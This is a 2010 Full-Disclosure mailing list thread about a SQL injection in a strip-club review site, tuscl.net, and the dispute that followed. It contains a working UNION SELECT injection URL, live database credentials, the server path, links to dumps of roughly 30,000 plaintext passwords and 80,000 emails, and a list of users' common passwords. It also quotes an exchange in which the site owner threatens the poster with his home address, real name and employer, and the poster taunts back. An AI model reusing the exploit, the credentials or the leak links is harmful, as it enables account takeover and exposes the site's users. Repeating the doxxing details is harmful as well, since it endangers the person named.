Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list

[Ben <iluv2cane () gmail com>]

*From:*  "www.tuscl.net" <tuscl.founder () gmail com>
*To:*  auto595158 () hushmail com, iluv2cane () gmail com, benhuoh () gmail com,
benhu () physics uakron edu
*Date:*  Wed, 08 Sep 2010 19:01:24 +0000

Just received this email from the owner of the site:

Ben

How 'bout I send a couple of strippers over to your condo there in Akron so
you can cane them.  You're still at 1381 Waters Edge, right?


Then maybe I will blast out an email to all your colleagues there at the
physics department of  the University of Akron with this little jewel...

*I have a suggestion for a Mood Pictures movie whic would be called
something like "Crime Deterrent Video for Girls." ...
*
Ah, hell, Ben, you know the plot... but what I really like is the last line
of the email:

*"I think it is a nice psychological touch to imagine a class of 14 or 15
year-old girls being made to see the canings shown in this video.  "
*
I'm sure the FBI will be all over that.


Tell you what Mr. Ben Yu-Kuang Hu, let's make a deal.  You clean up the mess
you made, stay the hell off my site, and I will forget this little escapade
ever happened.

Deal?

-----------------------------------------------
So first off, I should report your ass to the FBI for prostitution.

Second, this email account I signed up with, happened to contain the same
password for your site as it did it's email.
So to hide myself further and cause you to run around chasing my proxies and
pin the blame on some retard who is obsessed over BDSM.

Third, Ill fix your website, give me the root password :D

On Fri, Sep 3, 2010 at 8:37 PM, Ben <iluv2cane () gmail com> wrote:

> worked in firefox....
> if you see the title bar stating 3,8
> thats the union select ;)
> also per this page: http://www.tuscl.net/contact-login.php
>
> Recently we lost a week's worth of user data. We believe it was the work of
> hackers, and have tightened our security measures.
>
>
> On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000 () yahoo com> wrote:
>
> > Well, one thing I will point out is that the link you submitted for the
> > actual SQL injection doesnt seem to work. Either they fixed it or you messed
> > up the link.
> > ------------------------------
> > *From:* Ben <iluv2cane () gmail com>
> > *To:* full-disclosure () lists grok org uk
> > *Sent:* Fri, September 3, 2010 11:09:04 AM
> > *Subject:* [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text
> > Passwords & 80k Email list
> >
> > I found many sql injections on Tuscl.net (The ultimate strip club list)
> >
> > I tried notifying the site, no response. The server is ran on a vmware. So
> > anything that is done to it is restored, apon reboot.
> >
> > This is a dump of usernames passwords and emails for the site. They are in
> > plain text. I have removed records that had the system generated password
> > that the user never changed.
> >
> > http://tinyurl.com/397rzqs
> > http://bit.ly/bkVnPY
> > http://is.gd/eTqna
> >  http://jump.fm/FOJRO
> > http://www.mediafire.com/?l6i1vd25il61a6b
> > http://www.megafileupload.com/en/file/265174/users-sql-zip.html
> >  http://www.4shared.com/file/w0qqRyDf/userssql.html
> > http://rapidshare.com/files/416858410/users.sql.zip
> >  http://rapidshare.com/files/416860069/users.sql.zip
> > http://www.speedyshare.com/files/24097837/users.sql.zip
> >  http://uploading.com/files/e1741mm9/users.sql.zip/
> > http://bit.ly/cFvd8B
> > http://is.gd/eTsn5
> >
> >
> >
> > http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
> >
> > Common Passwords and the number of accounts that shared them
> >
> > password - 269
> > 123456 - 173
> > tuscl - 84
> > stripper - 67
> > qwerty - 62
> > 12345 - 49
> > 12345678 - 47
> > 1234 - 42
> > baseball - 36
> > monkey - 36
> > princess - 34
> > stripclub - 33
> > strip - 32
> > jennifer - 32
> > abc123 - 32
> > mustang - 31
> > pussy - 29
> > lapdance - 27
> > andrew - 27
> > jmh1978 - 27
> > letmein - 27
> > fuckyou - 27
> > 696969 - 27
> > michelle - 26
> > harley - 25
> > dallas - 25
> > 111111 - 25
> > shadow - 24
> > corvette - 24
> > trustno1 - 24
> > sunshine - 22
> > dragon - 21
> > jordan - 21
> > love - 21
> > butthead - 20
> > batman - 20
> > danielle - 20
> > buster - 20
> > password1 - 20
> > hello - 20
> > biteme - 20
> > gaydar - 20
> > Michael - 19
> > george - 19
> > hockey - 19
> > ginger - 19
> > 6969 - 19
> > Bandit - 19
> > lasvegas - 18
> > taylor - 18
> > tigger - 18
> > yankees - 18
> > chicago - 18
> > fucker - 18
> > blahblah - 17
> > football - 17
> > 1escobar2 - 17
> > 1111 - 17
> > Jessica - 17
> > 123456789 - 16
> > testing - 16
> > phoenix - 16
> > badboy - 16
> > gemini - 16
> > ranger - 16
> > heather - 15
> > gateway - 15
> > secret - 15
> > welcome - 15
> > 654321 - 15
> > aaaaaa - 15
> > tennis - 15
> > asshole - 15
> > maggie - 14
> > pepper - 14
> > charlie - 14
> > golfer - 14
> > strippers - 14
> > redskins - 14
> > summer - 14
> > peanut - 14
> > chicken - 13
> > jeremy - 13
> > hunter - 13
> > m0ntlure - 13
> > fuckoff - 13
> > dancer - 13
> > bitch - 13
> > lucky - 13
> > whatever - 13
> > killer - 13
> > prince - 13
> > robert - 13
> > orange - 13
> > thomas - 13
> > hawaii - 12
> > redsox - 12
> > tiger - 12
> > titties - 12
> > gators - 12
> > Password - cnt
> > florida - 12
> > kitten - 12
> > austin - 12
> > merlin - 12
> > canada - 12
> > diamond - 12
> > boston - 12
> > master - 12
> > yellow - 12
> > falcon - 12
> > jasmine - 12
> > 1234567 - 12
> > cookie - 12
> > superman - 12
> > midnight - 12
> > blowme - 12
> > jackass - 12
> > sparky - 12
> > peekaboo - 11
> > doctor - 11
> > brandy - 11
> > 8675309 - 11
> > madison - 11
> > braves - 11
> > brooklyn - 11
> > money - 11
> > anthony - 11
> > samantha - 11
> > ashley - 11
> > lucky1 - 11
> > amanda - 11
> > booboo - 11
> > SOCCER - 11
> > tarheels - 11
> > bigdog - 11
> > pookie - 11
> > private - 11
> > tiffany - 11
> > martin - 11
> > silver - 11
> > lakers - 10
> > eatme - 10
> > junior - 10
> > platinum - 10
> > sex - 10
> > iloveyou - 10
> > nicole - 10
> > vegas - 10
> > wolfpack - 10
> > 55555555 - 10
> > barney - 10
> > melissa - 10
> > molly - 10
> > passw0rd - 10
> > sexy - 10
> > nascar - 10
> > dietcoke - 10
> > chris - 10
> > boomer - 10
> > test123 - 10
> > johnny - 10
> > red123 - 10
> > asdfgh - 10
> > ncc1701 - 10
> > 314159 - 10
> > internet - 10
> > jackson - 10
> > computer - 10
> > peaches - 10
> > horny - 10
> > sierra - 10
> > rush2112 - 10
> >
> > Here is the complete list of email addresses registered. The site had no
> > validated so, I am sure, some are fake.
> >  http://www.tuscl.net/emails.zip
> > http://rapidshare.com/files/416871314/emails.zip
> >  http://www.mediafire.com/?67rzfbvmyr1c492
> > http://www.speedyshare.com/files/24098846/emails.zip
> > http://www.megafileupload.com/en/file/265210/emails-zip.html
> >
> > The path to the working directory is: /home/httpd/vhosts/
> > tuscl.net/httpdocs/
> >
> > The SQL information is
> > "localhost" - "tuscl" - "szg4wpl9"
> >
> > Also if you want to look at all the nudey photos uploaded here is where
> > they are
> > http://www.tuscl.net/pictures/
> >
> > There are other sites that could have been comprimised as well:
> > vanjonesthinksimanasshole.com
> > tuscl.com
> > onerun.com
> > ecampguide.com (contains another 1200 plain text passwords)
> > troopedge.com
> >
> > Well have fun!
> > Owner or media if you want get ahold of me:
> > auto595158 () hushmail com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/